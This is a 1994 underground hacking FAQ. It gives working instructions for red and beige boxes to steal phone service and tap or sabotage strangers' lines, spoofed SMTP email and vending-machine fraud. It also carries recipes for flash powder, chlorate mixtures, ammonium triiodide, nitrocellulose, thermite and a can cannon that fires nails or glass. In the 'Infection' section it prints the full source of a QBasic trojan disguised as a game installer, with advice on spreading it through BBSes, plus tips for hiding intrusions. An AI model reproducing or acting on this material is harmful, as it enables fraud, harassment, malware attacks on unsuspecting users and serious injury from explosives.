Jun 13, 1994 19:54 from Belisarius
_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***
+---------------+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+---------------+
"Knowledge is power" --Francis Bacon
"United we stand, divided we fall" --Aesop
=+=+=+=+=+=+=+=+=+= HACK-FAQ! Non-Copyright Notice =+=+=+=+=+=+=+=+=
= =
+ MatrixMage Publications. 1994 No rights reserved. +
= =
+ This file may be redistributed provided that the file and this +
= notice remain intact. This article may not under any =
+ circumstances be resold or redistributed for compensation of any +
= kind. Distribution of THE HACK-FAQ! is encouraged and promoted. =
+ +
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
<*> Edited by <*>
# Editor-in-Chief #
Belisarius < temporary loss of E-mail >
can be reached on ISCA, Shadow, SkyNET, Brinta and
Baltimore 2600 Meetings and other nameless locations.
# Asst. Editor (non communicado) #
Neurophire (on Shadow and N P on ISCA)
A MatrixMage Electronic Publication
Special Thanks to the Following Contributors:
Z Maestro RA of ISCA Underground>
DINO RA of Shadow Hack and Crack>
Artimage RA of SKYNET Underground>
Faunus Revolution Miska Informatik
Matrixx Amarand Crypto Steelyhart aBBa / PfA
Beelzebub Redbeard Squarewave
IO CyberSorceror Caustic
Doktor Nil Skipster Walrus
CPT Ozone Abort Kyoti
Carsenio Aero Phrack
AND NOW A WORD FROM YOUR EDITOR:
Throughout history mankind has been afraid of the unknown.
Before lightning could be scientifically explained it was blamed on
the anger of the gods. This belief in mysticism persisted throughout
the ages (and still does today). Later as man acquired simple herbal
and chemical knowledge, these men were revered as mages, users of
mystical arts derived from the old gods. But as organized religion
(i.e. Christianity especially Roman Catholicism) spread and came to
dominate society (became the powers that be), the mage was no longer
revered. The mage (who only sought to understand the world around
himself and make the world a better place) was persecuted, attacked
and driven underground by the church. But driving these mages
underground (out of society) did not stop there ideas from spreading
or them from continuing to work. The church label Copernicus as a
heretic and mage and only this century has the Roman Catholic church
accepted his principles (heliocentric universe) as fact.
So are 'hackers' the same today. We surf the nets seeking
knowledge and information (and hopefully understanding). Information
and understanding the meaning and import of the information are the
two greatest commodities and bases of power in the world today.
These things are easy to disseminate and gather in the electronic
world. The matrix (cyberspace/web/net [whichever term you choose]
is able to influence and control information faster and better than
ever before. This makes many afraid of the cyberculture (not to
mention a deep-seated techno-fear of many people, anything new and
technical is bad).
We are a new breed of mage; seeking knowledge, desiring
understanding, persecuted by the powers that be. This is why I have
started this publication. We are the MatrixMages! Our mission is
to learn and to pass on that knowledge.
-=> Belisarius <=-
*********************************************************************
What is 'Cyberpunk' and the Underground?
"Every time I release a phile, or write an article for a zine, it's
vaguely like a baby. It gets stored, and copied, and sent out all
over the world, and people read it. It goes into their minds.
Something I created is buried in living tissue and consciousness
someplace. Eventually somebody uses it, and I know that I have the
power to change the world. Somewhere, someplace, somebody changed
something using information I changed or created. I helped to
change the world." --Unknown
That is the attitude of many of the people who, knowingly or not, are
members of this hyped/wired/cyber culture. Some who may read this
will see some of their undefined beliefs, hopes and feelings
reflected in the above quote. And, as the quote says, they will
help spread it. Somewhere, somehow, that quote will change the
world.
But only if you work to change it. Remember that information and
knowledge a powerful commodities. He who has information cannot
be beaten. So above all the most important thing to do in the
"Underground" is to gather information. This means that you have to
work and put in some effort. You don't get something' for nothing!
So work hard and together we can change the world!
Keep up with latest editions. (Sorry there haven't been many lately
but exams and not failing out took precedence!)
The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre,
or any contributor are not responsible for any consequences.
You use this information at your own risk.
*********************************************************************
CONTENTS
*********************************************************************
Sections
I. Phone Fun
(Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
II. Fake E-Mail
(Fooling UUCP)
III. Social Engineering
(Free sodas, Dumpster Diving, ATMs, Carding)
IV. The Big Bang
(Making Weapons and Explosives)
V. Infection
(Virii, Trojans, Worms and other creepy crawlies)
VI. NEWBIES READ THIS
(Basic Hacking)
VII. Screwing with the most widespread operating system on the net
(UNIX / AIX Hacking)
VIII. Screwing with the most secure operating system on the net
(VAX/VMS Hacking)
IX. Screwing with the most widespread operating system on PCs
(MS-DOS Hacks)
X. Finding out what that encrypted info is
(Cracking programs)
XI. How do I keep my info secure
(PGP / Cryptology)
XII. Chemistry 101
(explosive/pyrotechnic component prep)
XIII. Fun things with solder, wires, and parts
(Underground electronics)
XIV. Watching television
(cable, Pay-Per-View(PPV), scrambling)
XV. Tuning in to what's on the radio waves
(Radios and Scanning)
Appendices
A. FTP sites with useful info
B. Interesting Gophers
C. Informative USENET Newsgroups
D. Publications and Zines
E. Books
F. Files and Papers
G. Cataglogs
H. PGP Keys
*********************************************************************
=====================================================================
I. Phone Fun
(Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
WHAT IS A RED BOX AND HOW DO I MAKE ONE?
(from Doktor Nil)
First note: a redbox is merely a device which plays the tone a
payphone makes when you insert money. You just play it through the
mike on the handset. You would think that the Phone Co. would mute
the handset until you put a quarter in, and perhaps they are starting
to build phones like that, but I have yet to see one.
What you need:
- Radio Shack 33 memory Pocket Tone Dialer
- 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address
below)
- A solder gun.
- Someone who can point out the crystal in the Tone
Dialer.
Instructions:
1) Open up the back of the tone dialer. Use screwdriver.
2) Locate crystal. It should be toward the right side.
It will be smaller than the 6.5 MHz one you bought, but otherwise
vaguely similar. It is basically capsule-shaped, with two electrodes
coming out of the bottom which are soldered onto a circuit board.
It's on the _left_ side, basically the third large crystal thing from
the bottom, about 1.5 cm long, metallic, thin.
3) De-solder, and de-attach, crystal. Heat the solder that the
crystal is seated in; remove crystal.
4) Attach 6.5 MHz crystal. It is easiest just to use the solder which
is already there from the old crystal, that way there is less chance
of you dropping hot solder somewhere it shouldn't be and losing
everything. Heat first one drop of solder with the solder gun, and
seat one electrode of the 6.4 MHz crystal in it, then do the same
with the other. This is the easiest part to mess up, be careful that
both drops of solder don't run together.
5) Put cover back on. you are done.
How to use: Five presses of the "*" key will make the quarter sound.
I think fewer presses make nickel/dime sounds, but I can't remember
specifically. Here in Michigan, you can simply hold it up to the
handset and press memory recall button 1 (where you have conveniently
recorded five *'s -read the tone dialer directions on how to do this)
and get a quarter credit, _IF_ you are calling LD. Keep making the
tone to get additional credits. There is a maximum number of credits
you can have at once.
To make a local call this may not work. You need to first put in a
real coin, then you can use the redbox for additional credits. There
may be a way around this, however: Call the operator, and ask her to
dial your number for you. She should do this without asking why, it
is a regular service. If you need an excuse, say the "4" key isn't
working, or something. She will ask you to insert your money. At
this point use the redbox. If all goes well, she dials your number
and you're in business. If she says "Will you do that one more time,"
or "Who is this," or any variations, hang up and walk away.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT DO THESE CRYSTALS LOOK LIKE?
In most cases, a rectangular metal can with two bare wires coming out
of one end, and a number like "6.50000" stamped on one side.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL?
(from Matrixx)
6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
is the easiest to find (Radio Shack)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX?
The crystals are available from Digi-Key. Call 1-800-DIGIKEY
(1-800-344-4539) for more info. The part order number from
DIGI-KEY is x-415-ND
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX?
(from DINO)
For a Radio Shack conversion red box: a nickel is one * and a quarter
is 5 *'s
Here are the freqs for a red box:
$.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse
with 33 millisecond pause between each pulse
$.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66
millisecond pauses
$.05 one pulse at the above freqs for 66 milliseconds!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW DO YOU KNOW THAT THE PHONE IS A COCOT?
(from Faunus, Carsenio)
If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT
is a general term for Customer owned or "Bell-independent" phone
companies. Sometimes they are more shabbily constructed than real
fortress phones but others look about the same except for a lack of
phone company logo.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FOOLING COCOTS USING 800 NUMBERS?
You call up an 800 number as any public phone HAS too let you dial
800 numbers for free. Then you let the person who answers the 800
number hang up on you, THEN you dial your number that you want to
call free. OK MOST COCOTs disable the keypad on the phone so you
CANT just dial the number, you have to use a pocket tone dialer to
dial the number.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW DO I MAKE A BEIGE BOX?
(from Neurophyre)
Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
clips, ratchet wrench, 7/16-inch hex head
1. Cut the head off one end of the phone cord.
2. Strip the coating back about two (2) inches.
3. Look for the red wire, and the green wire.
4. Mark one clip green and put it on the green.
5. Mark the other red and put it on the red.
6. Once you have them soldered and insulated, plug the other end
(that still has the head) into a phone.
7. Go out in the daytime and look for green bases, green rectangular
things sticking about 3 feet out of the ground with a Bell logo on
the front. If you're a lamer, you'll waste your time with a
cable company box or something. I've heard of it.
8. Come back to a secluded one at night. With the wrench, open it
up.
9. Find a set of terminals (look like the threaded end of bolts
in my area) with what should be a red wire and a green wire
coming off them.
10. Plug in your beige box red to red and green to green, pick up the
phone and dial away!
Modems work too as well as taps and shit. You're using someone
else's line (unless you're an idiot) to get phone service. Don't
abuse the same line after the phone bill comes.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
BEIGE BOXING 101
Field Phreaking
by Revolution
At the beginning of the section in the Bell training manual
entitled "One million ways to catch and fry a phreak" it doesn't
have a disclaimer saying "for informational purposes only". So why
the hell should I put one here? Give this file to whoever you want,
just make sure it all stays together, same title, same byline.
Field phreaking gives you everything you've ever wanted: free
long distance calls, free teleconferencing, hi-tech revenge, anything
you can do from your own phone line and more, without paying for it,
or being afraid of being traced. Just be ready to bail if you see
sirens.
How to make a beige box: Easiest box to make. Cut your phone cord
before the jack, strip the wires a little. You should see a red
(ring) wire and a green (tip) wire. If you see yellow and black
wires too just ignore them. Put one set of alligator clips on the
red wire and one on the green wire, and you're set. (You want to
use your laptop computer, but you don't want to ruin your modem's
phone cord? Just unscrew a jack from a wall, unscrew the 4 screws on
the back, and do the same thing as above. Now you can use a phone,
laptop, anything you can plug in a jack.)
How to use: What you have is a lineman's handset. You can use it
from any bell switching apparatus (from now on sw. ap.). These are
on phone poles, where your phone line meets your house, and near
payphones. I'll go into detail below, but basically just open any
box on a telephone pole, and you'll see sets of terminals (screws),
with wires wrapped around them, just like on the back of a phone
jack. These screws are where you need to attach your alligator
clips to get a dial tone. Don't unscrew the screw, you'll just
fuck up some poor guys line, and increase your chances of getting
caught. After the wire goes around the screw, it normally twists
off into the air. Put your clip on the end of the wire. Do the
same with the other clip. If you don't get a dial tone, then
switch terminals.
On telephone poles:
TTI terminals: These must have been built by phreaks, just for
beige boxing. By far the easiest sw. ap. use. The only drawback
is that they only connect to one phone line. These are the fist
sized gray or black boxes that appear where a single phone line
meets the mother line. They look almost like outdoor electric
sockets, that have the snap up covering. They normally have the
letters TTI somewhere on the front. No bolts or screws to take
off, just snap up the top and you will see four screws. Clip in
and happy phreaking. Just click the top down and no one will ever
know you were there (except for the extra digits on their phone
bill.)
Green trees: just about the hardest sw. ap. to beige from (tied
with the bell canister) but if its the only one you can use, go for
it. These are the 3 foot high green/gray metal columns that are no
wider than a telephone pole (which makes them different then the
green bases, see below), that say "Call before digging, underground
cable," or the real old ones just have a bell sign. Usually green
trees are right at the base of phone poles, or within a foot or two
of them. These normally have two 7/16 bolts on one side of the
column, which have to be turned 1/8 a turn counterclockwise, and
the front of the base will slide off. Now you will see a sheet of
metal with a few square holes in it, that has a bolt where the
doorknob on a door would be. Ratchet this one off and the metal
sheet will swing open like a door. On one side of the sheet will
be a paper with a list of #'s this tree connects to. Inside you'll
see a mass of wires flowing from gray stalks of plastic in sets of
two. The whole mass will have a black garbage bag around it, or
some type of covering, but that shouldn't get in the way. The
wires come off the gray stalk, and then attach to the screws that
you can beige from, somewhere near the ground at the center of the
tree. These are on a little metal column, and sometimes are in a
zig-zag pattern, so its hard to find the terminals that match in
the right order to give you a dial tone.
Green bases: The gray/green boxes you see that look just like green
trees, except they are about twice or three times as wide. They
open the same as trees, except there are always 4 bolts, and when
the half slides off, inside is a big metal canister held together
with like 20 bolts. I wouldn't open it, but with a little info
from friends and some social engineering, I learned that inside is
where two underground phone lines are spliced together. Also inside
is either pressurized gas or gel. Pretty messy.
Bell canisters: attached to phone poles at waist level. They are
green (or really rusted brown) canisters about a two feet tall that
have a bell insignia on the side. They will have one or two bolts
at the very bottom of the canister, right above the base plate.
Take the bolts off and twist the canister, and it'll slide right
off. Inside is just like a green tree, except there normally isn't
the list of #'s it connects to.
Mother load: Largest sw. ap. A large gray green box, like 6 x 4,
attached to a telephone pole about three feet off the ground. a big
(foot or two diameter) cable should be coming out the top.
Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a
cabinet with double doors. Fasteners are located in the center of
the box and on the upper edge in the center. Both of these are
held on with a 7/16 bolt. Take the bolts off, and swing the doors
open. On the inside of the right door are instructions to connect
a line, and on the inside of the left door are a list of #'s the
box connects to. And in the box are the terminals. Normally 1,000
phones (yyy-sxxx, where yyy is your exchange and s is the first
number of the suffix, and xxx are the 999 phones the box connects
too).
On houses: follow the phone line to someone's house, and then down
there wall. Either it goes right into there house (then you're
screwed) or it ends in a plastic box. The newer boxes have a screw
in the middle, which you can take off with your fingers, and then
put the box back on when you're done, but the older ones are just
plastic boxes you have to rip off. Inside are 4 terminals, yellow,
black, and red and green, the two you need. Find the Christmas
colors, and phreak out.
On payphones: follow the phone line up from the phone, and sometimes
you'll find a little black box with two screws in it. Undo this,
and you'll find a nice little phone jack. You don't even need your
beige box for that one. If there's not one of those, follow the
wire to a wall it goes into, and sometimes there will be a sw. ap.
like those on houses (see above). Payphones are normally pretty
secure now though, and you probably won't find any of those.
Phreaky things you can do: Jesus, do I have to tell you lamers
everything? Anyway, free long distance calls should be pretty easy,
and get teleconferencing info from somebody else, just make sure
you ANI the # you're calling from before calling Alliance.
Hi-tech revenge!
Possibilities are endless, you have total control of this lamers
line. Most of you guys are probably way to elite for this one, but
you can disconnect his line by loosening a few screws and ripping
his wires at any sw. ap. but here's something a lot better: Get the
faggots number, and then find the mother load sw. ap. it connects
to (not the sw. ap. on his house or on the telephone pole in his
drive way, the _mother_load_) Find his # in the terminals, and then
connect the two terminals with a paper clip or an alligator clip! His phone
will be busy until ma bell
figures out what the hell is going on, and since the last place
they look is the mother load, this usually is at least a week.
Then, of course, is the funniest prank: Beige box from a major
store, like Toys R Us (that's my favorite) and call up ma bell
"Yeah, I'd like all calls to this number forwarded to (his
#)"
That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow,
phunk on IRC, or Revolution on Delphi. Any phreaks out there who
got new info, war stories or some addictive disorder and just need
somebody to talk to, E-mail revolution@delphi.com no PGP needed.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT PHONE NUMBER AM I CALLING FROM?
(from Skipster, et al)
This service is called ANI.
This number may not work, but try it anyway:
(800) 825-6060
You might want to try is dialing 311 ... a recorded message tells you
your phone #. Experiment, but 311 does work, if it doesn't and an
operator picks up, tell her that you were dialing information and
your hand must have slipped.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW DO I USE/DO ALLIANCE TELECONFERENCING?
(from Neurophire, Carsenio)
Set one of these up, it is a 1-800 dial-in conference. Then, grab
your beige box, go to some business, preferably something like a
Wal-Mart or a Radio Shack and beige box off their line. Then call
and set up a teleconference for whenever to be billed to the line
you are calling from. You'll want to know specifically what to ask
for. Alliance teleconferencing is 0-700-456-1000.
Dial the number (you're of course paying for this by the minute)
and you get automated instructions on how to choose the number of
ports for your conference call, and how to dial each participant..
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK?
(from Token)
Just scroll through your favorite business magazine and look for
800#s. Once you get a VMB system you can look for a box being used
and try the default passcodes <0000> , <9999> , etc. Like on the
INet, most people are too dumb to change their passwd. If you're
lucky you might get the root box (I did, the stupid ass's passwd
was <4321>).
=====================================================================
II. Fake E-mail
(Fooling UUCP)
HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)?
(from Beelzebub, Doktor Nil w/ Belisarius)
1. Telnet to port 25 of any internet server
(eg. telnet site.name.and.address 25)
2. If at all possible, AVOID TYPING "HELO".
3. Type: rcpt to (person to receive fake mail){ENTER}
4. Type: mail from (fake name and address){ENTER}
5. The mail server should ok each time after each name.
6. If it does not:
a) type vrfy and then the name of the person
b) as a last resort use helo, this will login your computer as
having been the source of the mail
7. Retype the commands, it should say ok now.
8. Type: data{ENTER}
9. The first line of the message will be the Subject line
10. Enter your letter
11. To send letter type a "." on an empty line.
12. Then type quit{ENTER}
13. This is traceable by any sysadmin ... don't harass people this
way.
14. If the person receiving the mail uses a shell like elm he/she
will not see the telltale fake message warning
"Apparently-To:(name)" even if not, most people wouldn't know
what it means anyway.
15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
so as to make it look more believable and cover any add-ons the
mail routine might try
16. Put a realistic mail header in the mail message to throw people
off even more. If there are To: and Date: lines then the
program probably won't add them on.
17. Also try to telnet to the site where the recipient has his
account. This works better if you know how to fool it.
=====================================================================
III. Social Engineering
(Free sodas, Dumpster Diving, ATMs, Carding)
WHAT DOES SALTING VENDING MACHINES DO?
When you take concentrated salt water (a high concentration of salt)
and squirt it into the change slot (preferably where the dollar
bills come in, though some say it doesn't matter), the salt will
short circuit the machine and out will pour change and hopefully
sodas.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ANOTHER WAY OF GETTING FREE SODAS?
This is an easier and actually more reliable way of getting free
sodas. It only wprks pn spme machines though, usually Coca-Cola.
Anyways, put in your change and as the last coin goes down the slot
start rapidly and repeatedly pressing the button of your choice.
If everything works well, then you should get two sodas and your
change back.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW ARE THE TRACKS OF ATM CARD ARRANGED?
The physical layout of the cards are standard. The logical arrangement
of the data stored on the magnetic strip varies from institution to
institution. There are some generally followed layouts, but not
mandatory.
There are actually up to three tracks on a card.
Track 1:
Designed for airline use. Contains name and possibly your account
number. This is the track that is used when the ATM greets you
by name. There is alot of variation in how things are ordered so
occasionally you get 'Greetings Q. John Smith' or
'Greetings John Smith Q.' rather than 'Greetings John Q. Smith'.
This track is also used
with the new airline auto check in (PSA, American, etc).
Track 2:
The main operational track for online use. The first thing
on the track is the Primary Account Number (PAN). This is usually
pretty standard for all cards. Some additional info might be on the
card such as expiration date.
One interesting item is the PIN (Personal Identification Number)
offset. When an ATM verifies a PIN locally, it usually uses an
encryption scheme involving the PAN and a secret KEY. This gives you
a "NATURAL PIN" (i.e. when they mail you your pin, this is how it got
generated). If you want to select your own PIN, they would put the
PIN OFFSET in the clear on the card. Just do modulo 10 arithmetic on
the Natural PIN plus the offset, and you have the selected PIN.
The PIN is never in the clear on your card. Knowing the PIN OFFSET
will not give you the PIN. This will require the SECRET KEY.
Track 3:
The "OFF-LINE" ATM track. It contains information such as your daily
limit, limit left, last access, account number, and expiration date.
The ATM itself could have the ability to write to this track to
update information.
=====================================================================
IV. The Big Bang
(Making Weapons and Explosives)
FLASH POWDERS:
(from Neurophyre)
Materials: Powdered magnesium, powdered potassium nitrate
1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
nitrate.
2. Light it with a long fuse cuz its so bright it might screw up your
eyes.
REAL Cherry Bomb Powder
4 parts by weight of potassium perchlorate
1 part by weight of antimony trisulfide
1 part by weight aluminum powder
Relatively Safe
3 parts by weight of potassium permanganate
2 parts by weight of aluminum powder
*VERY* Shock/Friction/Static/Heat Sensitive!
Use only if suicidal or desperate!
4 parts by weight of potassium chlorate
1 part by weight of sulfur
1 part by weight of aluminum powder
1) To use these mixtures, SEPARATELY pulverize each ingredient into a
fine powder, the finer it is, the more power you get. Use a mortar and
pestle if available, and grind GENTLY. Do not use plastic as this can
build a static charge. Remember, do them SEPARATELY.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
AMATEUR EXPLOSIVE (Ammonium Triiodide):
(from IO)
WARNING: This explosive is EXTREMELY shock sensitive when dry, and
moderately sensitive when wet!!! AVOID IT when dry! DO NOT store!
The purplish iodine vapor this produces during the explosion will stain
and corrode!
1) Take a small plastic bucket, add 3-4 inches of household ammonia.
This bucket will never be clean again, in all likelihood.
Try to get clear (non-pine, non-cloudy) ammonia. Or use an
ammonium hydroxide solution from a chemlab. This results in better
but more sensitive, and therefore dangerous crystals.
2) Drop in iodine (like you use on scratches) one drop at a time, or,
preferably, use crystals of iodine.
3) Let it settle, then pour it through a piece of cloth, discarding
the runoff.
4) Squeeze *gently* to get out excess liquid.
5) Mold it onto the thing you want to blow up, stand **way** back.
6) Wait for it to dry, and throw a rock at it.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW TO BUILD A TENNIS BALL CANNON?
1. Get six (6) tin cans.
2. From five of them remove the tops and bottoms.
3. From the last one remove only the top. (this is the last can to
make the breach)
4. The cans should overlap and be fit together to make a long barrel
closed at one end and open at the other.
___________________________________
open --> ()____)_____)_____)_____)_____)_____) <--closed
(barrel) 1 2 3 4 5 6 (breach)
5. Duct tape all of the cans together. USE LOTS OF TAPE!!
6. Put some gunpowder in the bottom of the CANnon.
7. Aim, brace the CANnon.
8. Spray hairspray or pour alcohol on the tennis ball and light.
9. Drop the ball into the can and STAND BACK!
Other ideas:
a) Make explosive tennis balls.
b) Launch potatoes.
c) Launch thumbtacks, nails, broken glass, etc.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)?
(from Terrorist's Handbook)
Materials: cotton, concentrated nitric acid, concentrated sulfuric
acid, distilled water
Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue
litmus paper
Procedure: 1. Pour 10mL of sulfuric acid into beaker.
2. Pour 10mL of nitric acid into beaker with sulfuric
acid.
3. Immediately add 0.5 gram of cotton.
4. Allow it to soak for EXACTLY three(3) minutes.
5. Remove the nitrocellulose.
6. Put the nitrocellulose into a beaker of distilled
water to wash it in.
7. Allow the material to dry.
8. Re-wash it.
9. Once neutral(acid/base) it can be dried and stored.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS THERMITE AND HOW DO I MAKE IT?
Thermite is a powder which burns incredibly hot (approx. 2200 deg C)
and can be used to burn through most anything.
Materials: powdered aluminum, powdered iron oxide
Procedure: mix the two powders together as evenly as possible
Ignition: thermite is difficult to ignite but these work
a) mix a small amount of potassium chlorate into the
thermite mixture and ignite with a few drops of
sulfuric acid
b) magnesium strip or 'sparkler' stuck into the powder
which is then lit as a fuse
=====================================================================
V. Infection
(Virii, Trojans, Worms and other creepy crawlies)
WHERE CAN I GET SOME VIRII?
The Virus eXchange BBS in Bulgaria. [number not available - :( ]
Problem: They demand a virus they don't have in their archives to
let you in. Good luck finding one. The best way is to write one,
even if it's in BASIC. It'll probably get you in. They have
THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps
from what I know! For more info, gopher to wiretap.spies.com and dig
around in their online library under technical info.
There are alot of places in the US to get virii too:
The Hell Pit in Chicago has over 1500, and they don't accept the
lame stuff like the ones written in basic, so they're all good ones.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
INTS USED:
(from Belisarius)
You want Int 18h, AH=03h,
Al==Num sectors to write
BX==offset of pointer to buffer
CH=cylinder Number
Cl=sector number
DX=head number
Dl=drive numbers
ES=segment of pointer with buffer
for CH=it's the low 8 bits of 10 bit cylinder number,
for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits),
0-5=sector number.
for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return:
AH=status, AL=number of sectors written flags, carry set if an error.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SAMPLE OF A TROJAN
(from Spear)
This is a little trojan I wrote in Qbasic 4.5 It's a bitch!
REM bitch by Spear
color 14,0
print"installing datafiles... Please wait..."
print"This may take up to 20 minutes, depending on your computer..."
shell "cd\"
for a = 1 to 100000
a$=str$(a)
c$="md" + a$ + ".hee"
shell c$
next a
cls
print"Cybermattixx Version 1.0 is now installed on your system..."
print"Have a shitty day!"
print " ?AM?"
print
input "Hit ENTER To REBOOT your System now!";a$
shell "boot.com"
How to use it?
This can pose as the installation program for a game. This means that
when you upload it to a BBS or something, and post that it is a
kickass game, people will download it and try to install it on their
computers!
What does it do?
This program changes directory to the root and makes 100000 dirs in
the root. You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md. To get rid of them any other way you
would have to format c: or d:
**
_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***
+---------------+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+---------------+
File 2 of 3
=====================================================================
VI. NEWBIES READ THIS
(Basic Hacking)
WHAT MAKES A SYSTEM SECURE?
(from alt.security FAQ)
"The only system which is truly secure is one which is switched off
and unplugged, locked in a titanium lined safe, buried in a concrete
bunker, and is surrounded by nerve gas and very highly paid armed
guards. Even then I wouldn't stake my life on it."
- originally from Gene Spafford
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT WOULD BE IDEAL PROTECTION OF A SYSTEM?
Password Access- Get rid of simple passwords; routinely change all
passwords; regular review/monitoring of password
files
Physical Access- Lock up terminals, personal computers, disks when
not in use; eliminate unnecessary access lines;
disconnect modems when not in use
Other measures- Know who you are talking to; shred all documents;
avoid public domain software; report suspicious
activity (especially non-working hours access)
What this all means is that hackers must now rely on the ineptitude
and laziness of the users of the system rather than the ignorance
of SysOps. The SysOps and SecMans (Security Managers) are getting
smarter and keeping up to date. Not only that, but they are
monitoring the hack/phreak BBSes and publications. So the bottom
line is reveal nothing to overinquisitive newbies...they may be
working for the wrong side.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT IS A FIREWALL?
(from the comp.security.misc FAQ)
A (Internet) firewall is a machine which is attached (usually)
between your site and a Wide Area Network (WAN). It provides
controllable filtering of network traffic, allowing restricted
access to certain Internet port numbers and blocks access to
pretty well everything else.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
HOW TO HACK WITHOUT GETTING INTO TROUBLE AND DAMAGING COMPUTERS?
1. Don't do damage intentionally.
2. Don't alter files other than than to hide your presence or to
remove traces of your intrusion.
3. Don't leave any real name, handle, or phone number on any
system.
4. Be careful who you share info with.
5. Don't leave your phone number with anyone you don't know.
6. Do NOT hack government computers.
7. Don't use codes unless you HAVE too.
8. Be paranoid!
9. Watch what you post on boards, be as general as possible.
10. Ask questions...but do it politely and don't expect to have
everything handed to you.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WHAT DO I DO IF I AM GETTING NOWHERE?
1. Change parity, data length, and stop bits. The system may not
respond to 8N1 (most common setting) but may respond to 7E1,8E2,
7S2, etc.
2. Change baud rates.
3. Send a series of carriage returns.
4. Send a hard break followed by a carriage return.
5. Send control characters. Work from ^a to ^z.
6. Change terminal emulation.
